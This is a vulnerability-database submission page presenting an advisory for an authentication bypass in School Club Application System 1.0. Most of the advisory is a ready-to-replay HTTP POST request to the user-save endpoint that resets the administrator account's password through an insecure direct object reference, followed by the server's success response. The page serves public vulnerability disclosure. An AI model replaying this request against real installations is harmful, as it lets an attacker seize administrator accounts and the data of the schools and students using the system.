Submeter #34399: School Club Application System (SCAS) 1.0 - Authentication Bypassinformação

TítuloSchool Club Application System (SCAS) 1.0 - Authentication Bypass
Descrição# Exploit Title: School Club Application System (SCAS) 1.0 - Authentication Bypass # Date: 2022-04-09 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux Title: ================ School Club Application System (SCAS) 1.0 - Authentication Bypass Summary: ================ School Club Application System (SCAS) in version 1.0 is vulnerable to bypass authentication by changing administrator password by insecure direct object reference (IDOR) attack, for this reason, attacker can gain full access to administrator account by resetting its password. Severity Level: ================ 6.5 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N Affected Product: ================ School Club Application System v1.0 Steps to Reproduce: ================ Request: POST /scas/classes/Users.php?f=save_user HTTP/1.1 Host: target.com Content-Length: 785 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOJM0GBfl6KS1ELuA Origin: http://target.com Referer: http://target.com/scas/admin/?page=manage_account Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="firstname" Administrator ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="username" admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="password" H4ck3d@ ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryOJM0GBfl6KS1ELuA-- Response: HTTP/1.1 200 OK Date: Sat, 09 Apr 2022 15:16:38 GMT Server: Apache/2.4.52 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"}
Fonte⚠️ https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html
Utilizador
 mrempy (UID 24379)
Submissão09/04/2022 17h32 (há 4 anos)
Moderação09/04/2022 20h16 (3 hours later)
EstadoAceite
Entrada VulDB196750 [School Club Application System 1.0 Users.php?f=save_user Elevação de Privilégios]
Pontos20

VoltarVisão GeralPróximo

Do you need the next level of professionalism?

Upgrade your account now!